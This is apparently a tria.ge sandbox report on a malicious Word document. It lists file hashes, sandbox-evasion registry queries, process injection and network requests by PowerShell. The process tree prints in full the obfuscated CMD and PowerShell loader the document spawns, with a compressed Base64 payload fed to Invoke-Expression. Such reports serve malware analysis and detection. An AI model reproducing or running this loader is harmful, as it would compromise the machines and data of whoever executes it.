Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28/05/2024, 17:32
Behavioral task
behavioral1
Sample
7dcbb80d5ae055544e38dd9268cea408_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7dcbb80d5ae055544e38dd9268cea408_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
7dcbb80d5ae055544e38dd9268cea408_JaffaCakes118.doc
-
Size
86KB
-
MD5
7dcbb80d5ae055544e38dd9268cea408
-
SHA1
c32062d2a938a1cfa99fe9c886050f47522f99a0
-
SHA256
d95311720ed12c7e3be657ff086e9b7781b89103be988ad10c7ecd60acee8512
-
SHA512
8b1dc6004e8c889db3b805134f65af25c6c91eab76684648e88a1f9d079fb6376fc4239ea6af1b152039a4dea74bbb1bced17f1279a522d063cccc27b057af17
-
SSDEEP
1536:eDtiocn1kp59gxBK85fBt+a9dnigsfdAHgLOIlzVb6TPb1eSN2taxZv6ERQIp:C41k/W48rigsfdAHgLOIlzVb6TPb1eS5
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1844 552 CMD.exe 89 -
Blocklisted process makes network request 10 IoCs
flow pid Process 25 3836 powershell.exe 27 3836 powershell.exe 29 3836 powershell.exe 32 3836 powershell.exe 41 3836 powershell.exe 44 3836 powershell.exe 52 3836 powershell.exe 53 3836 powershell.exe 57 3836 powershell.exe 59 3836 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 552 WINWORD.EXE 552 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3836 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 552 WINWORD.EXE 552 WINWORD.EXE 552 WINWORD.EXE 552 WINWORD.EXE 552 WINWORD.EXE 552 WINWORD.EXE 552 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 552 wrote to memory of 1844 552 WINWORD.EXE 93 PID 552 wrote to memory of 1844 552 WINWORD.EXE 93 PID 1844 wrote to memory of 1708 1844 CMD.exe 95 PID 1844 wrote to memory of 1708 1844 CMD.exe 95 PID 1708 wrote to memory of 3836 1708 cmd.exe 96 PID 1708 wrote to memory of 3836 1708 cmd.exe 96
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7dcbb80d5ae055544e38dd9268cea408_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SYSTEM32\CMD.exeCMD /c C:\WInDOWs\SyStEm32\CMD /c "sEt agW=sV xdr ([chAR[] ] ") )93]rahC[]gnirtS[,'6ni'(eCALpeR.)43]rahC[]gnirtS[,)66]rahC[+79]rahC[+67]rahC[((eCALpeR.)63]rahC[]gnirtS[,)75]rahC[+79]rahC[+68]rahC[((eCALpeR.)' )6ni6niNIOj- ])HTgnEL.EULaV.) 4fzYe'+':elbaIrav IG ( (- ..1 -[EULaV.)'+' 4fzYe:elbaIrav IG ('+'(XEI ; ) BaL ^& ( 9aVen'+'v:CoMsPEc[4,15,25]-joiN6ni6ni)( ((6ni^&( 6ni+6niiuGEnv:ComsPEc'+'[4,26,25]6ni+6'+'ni-jO6ni+6niiNa16ni+6niba1b) (NEw-oBJ'+'eCt SysT6ni+6'+'niem6ni+6ni.6ni+6niIO.C6ni+6niOMpR6'+'ni+6nie6ni+6nissI6ni+6nioN.De6ni+6niFlAtEStREAm([sySteM.io6ni+6ni.mEMOrystre'+'6n'+'i+6niAm] '+'[coN6ni+6niVErt]::fRomBase646ni+6nis6ni+6nitR6ni'+'+6niing( a1bN6ni+6niY9R6ni+6niT4MwFI6ni+6niX/Cg9NOoJr6ni+6ni9'+'c6ni+6nim6ni+6ni4'+'hmQ'+'6nQGT6ni+6nimejDIvGlwB6ni+6niVqS6ni+6ni06ni+6nivgyl6ni+6niDCfx6ni+6ni8s8nq6ni+6ni+ky/nkOzwEF6ni+6nio4'+'rV'+'36D6n'+'i+6niR6ni+6nil6B6ni+6ni0B2h'+'H6ni+6niRnFF6ni+6'+'nigU5O6ni+6niMnC6ni+6niWmJW6ni+6niG841waqGg6n'+'i+6niopmxwsyzW6ni+6ni3yfY6ni+6nifo6ni+6niWxRVrJhm'+'at46ni+6nimTwp3e6ni+6ni/6ni+6niuFyg7M6ni+6niMB6ni+6nicU/6ni+6niB9s6ni+6niWRgWm6ni+6nidg6ni+6ni66ni+6nikvk6ni+6nit3H/l6ni+6nixwX6ni+6niY6ni+6nirE1M6ni+6nimW14dF6ni+6nibVK6ni+6niK6ni+6nim7L02Cld06ni+6niS31Bl6ni+6niHv6ni+6ni1Q6ni+6nio6ni+6ni/e36ni+6niVxTQeLnO6ni+6niCR6ni+6nigu6'+'ni+6niw1OwwL6SY6ni+6niOZB5RBD6n'+'i+6ni16ni+6niR8uQ6ni+6niZkVq5I3r146ni+6niyn6ni+6nirzF6ni+6ni3/'+'A5ncg6ni+6ni026ni+6nif26E6ni+6ni7W6ni+6niOJ6ni+6'+'nin6ni+6'+'nivlYFL'+'6ni+6ni58q6ni+6nibhb6IbOc06ni+6nir6ni+6niKNJeklEOnm6ni+6ni'+'0GKepWT6ni+6nimM4x6ni+6nik=6ni+6nia6ni+6ni1b ) 6ni+6ni,[6ni+6niio.6ni+6nicOmP6ni+6nir6ni+6niESs6ni+6niIon6ni+6ni.6ni+6niCOmpR6ni+6n'+'iessiO6ni+6niNMOdE]::6ni+6nidECOMprEsS) 3K0 F6ni+6'+'niO'+'ReA6ni+6niCH-oB6ni+6niject 6ni+6ni{NEw-o6ni+6niBJe6ni+6niCt S6ni+6niY6ni+6'+'nisT6n'+'i+6niE6ni+6nim.iO.sTRE6ni+6niaMrE6ni+6niAdER(iuG_ , [S6ni+6niY6ni+6niS6ni+6niteM.t6ni+6niext.ENCODiN6ni+6nig]::6ni+6niasCIi)} ).re6ni+6niadt6ni+6niOEnd6ni+6ni( )6ni)-CREPLacE([cHAr]105'+'+[cHAr]117+[cHAr]71),[cHAr]36 -RePLACE([cHAr]97+[cHAr]'+'49+[cHAr]98),[cHAr]39-CREPLacE ([cHAr]51+[cHAr]75+[cHAr]48),[cHAr]124)) BaL( 4FzyE eLBAIRAv-tEs'(( )''nIoj-]52,51,4[CepSmoc:vne$ (^& " ); [ArRAY]::RevErsE((gET-ChiLDITeM VArIaBle:XDR ).vALUE); . ( ([sTring]$vErBOSeprefeREnCE)[1,3]+'X'-JoIn'')( [STrInG]::JoIn( '' ,(gET-ChiLDITeM VArIaBle:XDR ).vALUE ) ) &&pOWErSheLl ${EXecuTiOncoNtEXT}.\"IN`VOKecO`MMANd\".(\"{0}{2}{1}\" -f'i','t','nvOkEsCrip' ).Invoke(( .(\"{2}{1}{0}\" -f'EM','IT','get-' ) ( \"{0}{2}{1}\"-f 'ENv:','w','ag') ).\"val`UE\" )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\WInDOWs\SyStEm32\cmd.exeC:\WInDOWs\SyStEm32\CMD /c "sEt agW=sV xdr ([chAR[] ] ") )93]rahC[]gnirtS[,'6ni'(eCALpeR.)43]rahC[]gnirtS[,)66]rahC[+79]rahC[+67]rahC[((eCALpeR.)63]rahC[]gnirtS[,)75]rahC[+79]rahC[+68]rahC[((eCALpeR.)' )6ni6niNIOj- ])HTgnEL.EULaV.) 4fzYe'+':elbaIrav IG ( (- ..1 -[EULaV.)'+' 4fzYe:elbaIrav IG ('+'(XEI ; ) BaL & ( 9aVen'+'v:CoMsPEc[4,15,25]-joiN6ni6ni)( ((6ni&( 6ni+6niiuGEnv:ComsPEc'+'[4,26,25]6ni+6'+'ni-jO6ni+6niiNa16ni+6niba1b) (NEw-oBJ'+'eCt SysT6ni+6'+'niem6ni+6ni.6ni+6niIO.C6ni+6niOMpR6'+'ni+6nie6ni+6nissI6ni+6nioN.De6ni+6niFlAtEStREAm([sySteM.io6ni+6ni.mEMOrystre'+'6n'+'i+6niAm] '+'[coN6ni+6niVErt]::fRomBase646ni+6nis6ni+6nitR6ni'+'+6niing( a1bN6ni+6niY9R6ni+6niT4MwFI6ni+6niX/Cg9NOoJr6ni+6ni9'+'c6ni+6nim6ni+6ni4'+'hmQ'+'6nQGT6ni+6nimejDIvGlwB6ni+6niVqS6ni+6ni06ni+6nivgyl6ni+6niDCfx6ni+6ni8s8nq6ni+6ni+ky/nkOzwEF6ni+6nio4'+'rV'+'36D6n'+'i+6niR6ni+6nil6B6ni+6ni0B2h'+'H6ni+6niRnFF6ni+6'+'nigU5O6ni+6niMnC6ni+6niWmJW6ni+6niG841waqGg6n'+'i+6niopmxwsyzW6ni+6ni3yfY6ni+6nifo6ni+6niWxRVrJhm'+'at46ni+6nimTwp3e6ni+6ni/6ni+6niuFyg7M6ni+6niMB6ni+6nicU/6ni+6niB9s6ni+6niWRgWm6ni+6nidg6ni+6ni66ni+6nikvk6ni+6nit3H/l6ni+6nixwX6ni+6niY6ni+6nirE1M6ni+6nimW14dF6ni+6nibVK6ni+6niK6ni+6nim7L02Cld06ni+6niS31Bl6ni+6niHv6ni+6ni1Q6ni+6nio6ni+6ni/e36ni+6niVxTQeLnO6ni+6niCR6ni+6nigu6'+'ni+6niw1OwwL6SY6ni+6niOZB5RBD6n'+'i+6ni16ni+6niR8uQ6ni+6niZkVq5I3r146ni+6niyn6ni+6nirzF6ni+6ni3/'+'A5ncg6ni+6ni026ni+6nif26E6ni+6ni7W6ni+6niOJ6ni+6'+'nin6ni+6'+'nivlYFL'+'6ni+6ni58q6ni+6nibhb6IbOc06ni+6nir6ni+6niKNJeklEOnm6ni+6ni'+'0GKepWT6ni+6nimM4x6ni+6nik=6ni+6nia6ni+6ni1b ) 6ni+6ni,[6ni+6niio.6ni+6nicOmP6ni+6nir6ni+6niESs6ni+6niIon6ni+6ni.6ni+6niCOmpR6ni+6n'+'iessiO6ni+6niNMOdE]::6ni+6nidECOMprEsS) 3K0 F6ni+6'+'niO'+'ReA6ni+6niCH-oB6ni+6niject 6ni+6ni{NEw-o6ni+6niBJe6ni+6niCt S6ni+6niY6ni+6'+'nisT6n'+'i+6niE6ni+6nim.iO.sTRE6ni+6niaMrE6ni+6niAdER(iuG_ , [S6ni+6niY6ni+6niS6ni+6niteM.t6ni+6niext.ENCODiN6ni+6nig]::6ni+6niasCIi)} ).re6ni+6niadt6ni+6niOEnd6ni+6ni( )6ni)-CREPLacE([cHAr]105'+'+[cHAr]117+[cHAr]71),[cHAr]36 -RePLACE([cHAr]97+[cHAr]'+'49+[cHAr]98),[cHAr]39-CREPLacE ([cHAr]51+[cHAr]75+[cHAr]48),[cHAr]124)) BaL( 4FzyE eLBAIRAv-tEs'(( )''nIoj-]52,51,4[CepSmoc:vne$ (& " ); [ArRAY]::RevErsE((gET-ChiLDITeM VArIaBle:XDR ).vALUE); . ( ([sTring]$vErBOSeprefeREnCE)[1,3]+'X'-JoIn'')( [STrInG]::JoIn( '' ,(gET-ChiLDITeM VArIaBle:XDR ).vALUE ) ) &&pOWErSheLl ${EXecuTiOncoNtEXT}.\"IN`VOKecO`MMANd\".(\"{0}{2}{1}\" -f'i','t','nvOkEsCrip' ).Invoke(( .(\"{2}{1}{0}\" -f'EM','IT','get-' ) ( \"{0}{2}{1}\"-f 'ENv:','w','ag') ).\"val`UE\" )"3⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWErSheLl ${EXecuTiOncoNtEXT}.\"IN`VOKecO`MMANd\".(\"{0}{2}{1}\" -f'i','t','nvOkEsCrip' ).Invoke(( .(\"{2}{1}{0}\" -f'EM','IT','get-' ) ( \"{0}{2}{1}\"-f 'ENv:','w','ag') ).\"val`UE\" )4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4552,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4180 /prefetch:81⤵PID:3952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58b9dba3b542838e3cf062c1f538c54f6
SHA11ca2ffcc651a134a44200a390a2fa99098be2708
SHA256e14c8525939660b7d67e751729e23f62cd433be1d6f6637d5ccc19e910d2f4bc
SHA51245f32036bff75cb8b68daae70452325d4f1ba85bb263ee375c44ca47035ac6d9c4b5f24b0f176de3bab4ade58a59c770a17af40a9d17a213f2fc85b02467da47
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82